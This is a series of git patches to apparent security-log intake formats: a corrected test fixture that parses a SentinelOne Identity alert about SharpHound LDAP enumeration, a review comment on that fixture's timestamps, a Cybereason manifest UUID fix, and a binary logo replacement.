\"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}" + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", 
\"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" }, "expected": { - "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n 
\"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n 
\"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n 
\"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n 
\"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n 
],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n 
\"callbacks\": []\n}",
+ "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
 "event": {
 "category": "intrusion_detection",
+ "end": "2024-11-22T08:45:50Z",
 "kind": "alert",
+ "provider": "Identity",
+ "reason": "This events is raised when a LDAP search Query is detected from the endpoint.",
+ "start": "2024-11-22T08:45:50Z",
 "type": "info"
 },
+ "@timestamp": "2024-11-22T08:45:50Z",
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
+ "process": {
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
 "sentinelone": {
 "identity": {
- "name": "Mocked api"
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-dc47-75de-8925-5f026bd5a705",
+ "name": "LDAP Search Detected",
+ "status": "NEW"
 }
 }
 }

From 9daca2729d6227513899135a5e32b0eb8337b757 Mon Sep 17 00:00:00 2001
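Review bot: Every timestamp in the new fixture is the same instant, so the expected `@timestamp`, `event.start` and `event.end` (all `2024-11-22T08:45:50Z`) cannot detect a mix-up between `detectedAt`, `firstSeenAt` and `lastSeenAt`, which are presumably their respective sources. Give the input three distinct values, e.g. `\"firstSeenAt\": \"2024-11-22T08:40:00.000Z\"` and `\"lastSeenAt\": \"2024-11-22T08:50:00.000Z\"`, and change the expected `event.start`/`event.end` to match, so a swapped mapping fails the test. Likewise `sha1`, `md5`, `assignee`, `result` and `storylineId` are all `null` in the input, so nothing here pins how non-null values land in `process.hash` or `related.hash`; a second fixture with those populated would cover that path. The top-level object's closing brace lies one line past the hunk.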
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 18:41:51 +0100
Subject: [PATCH 305/317] fix(CybeReason): fix the identifier of the connector associated to the intake

---
 CybeReason/malop-json/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CybeReason/malop-json/_meta/manifest.yml b/CybeReason/malop-json/_meta/manifest.yml
index f1b4f8074..e4cdd5419 100644
--- a/CybeReason/malop-json/_meta/manifest.yml
+++ b/CybeReason/malop-json/_meta/manifest.yml
@@ -1,7 +1,7 @@
 uuid: 9f89b634-0531-437b-b060-a9d9f2d270db
 name: Cybereason EDR
 slug: cybereason-malop-json
-automation_connector_uuid: ff092b32-68dc-11ee-8c99-0242ac120002
+automation_connector_uuid: 8128d255-22df-4f4c-96af-ca6c1123f4cf
 automation_module_uuid: b96361fb-a01b-4ae7-8927-9622b9ea0acf
 description: >-

From 82eeda946e6c3e4819b3cf7808c6d5f0623bc8fc Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Tue, 3 Dec 2024 17:30:15 +0100
Subject: [PATCH 306/317] fix(SentinelOne): fix the logo for identity

---
 SentinelOne/identity/_meta/logo.png | Bin 27937 -> 1853 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png index bad66643418120e4e1dbdc385258d64188b37661..817c84f53c5bbb9277dd6ba33f3ccb0ab2078e36 100644 GIT binary patch literal 1853 zcmcJQ|6kHc8o)vMl7e`(t6qwxU3Ha(r=~6z23nin0>#|&3#IL9qF^hK2x)>@)NU!6 z$)+oT>z5Uc*y1!bInK5fEtGXNF~z#XL_+CA?e;p|{c!)o{xHuo&&>0hndd#v%yTt? zc*Moo(-{N;xx_>tA_H1!ZyR8M#A#tcAP^i9bBJ)P=-UMY=}L0epZov)GCg}x(zvfB zCl?m)(i)iiZp&5v;pn}&iOpHnA1iY_l+@YKa>*scuB&RzHmUoKx`t=(NHNv?gdNvH z2-(hlH+C^o(_f-b%?)?G7c+-B;`bj6NaTZ}Pm14sY30x1aCOyLTN&i<%-}0uA$7*x z_?vB@qjHCRUCw`qL1C;Rnq1CCr+r#?5PrE$tYPEOMJI`Ch(<;HI)c1Qw-#0yClV zJQ!%j*G@Y6XCE6s$zZ!n(%ScE3e@=l___8p;SA4^$`eavzWw0+r+DIqZhVE~>M}T7 zCI_Z)9G>bMH^5o-$Vf=LgoazP2g+6*u$XiD0sg8p7L%+W;1QvW^jwAEBGHYJzFT1^ zgDn|3f(6t*p>5W!!%K(H4>+sPUW73MIefbNKH<}Wa2iv>pQ>-~3x#%CDLMkP+RL(aAGs)=#O9cdQi58%fEes(aHicurGZb{tb66K_2QUYhP~ zJbSQeNL(fFP3)daq^=+a+tuRzqmLFp3xd9gyh%XS2$;j(txmZ zf8ov=1Gc7A#?wn&uSW-1sq!%qjPtK2Y!bUvo_y?VuylgaoZ8y_9UR>5AfyA zc0ju}>(23kkWVvRf!k4KJSX?chK@ap_;kB64}7Izp`DO%3ZownbCSFhfNc*jBu-Gq0uJy{xmns28V zq4Ogt?$xze+St6QTsdBFK#d8v3ZpOt!Jfw$8F2RWi>Rgz`$II+ZFm8hSHIhsK$b-L zWVWEN)!R%$xE`;1)Cf5D0Z$Ojjdag&BVk`!8Yt0}p&0VMooecKUEI>`} zW*E&E_zot&N9ysI9e8%aMg>2e#=}SoGaS3V1yM3MfSv+TA_FY}9Wni`F*Xsn%M#CD zXDYiYl*PUGy=T=ERC0?+D}jg^S+Pr(uf?E%iI46Te=12 zR+#}i32vgwCTAjihtU$|u@IW?oU3l{C|!@w$Kg8@Clvgt3%o^1L#AVw4Mf4$_rVwi z;BIwl$rRl9+L7g?g?MRZp{7j;g($*L>rGQd+g=e{uf2CA2jkgN>BjlRBaPOG4%?=p rHgIkF*!Nse!&b*XsyzI^@|X`UDnrM|o3!VFvIvSfOgtoy%qaUEoY88+ literal 27937 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 
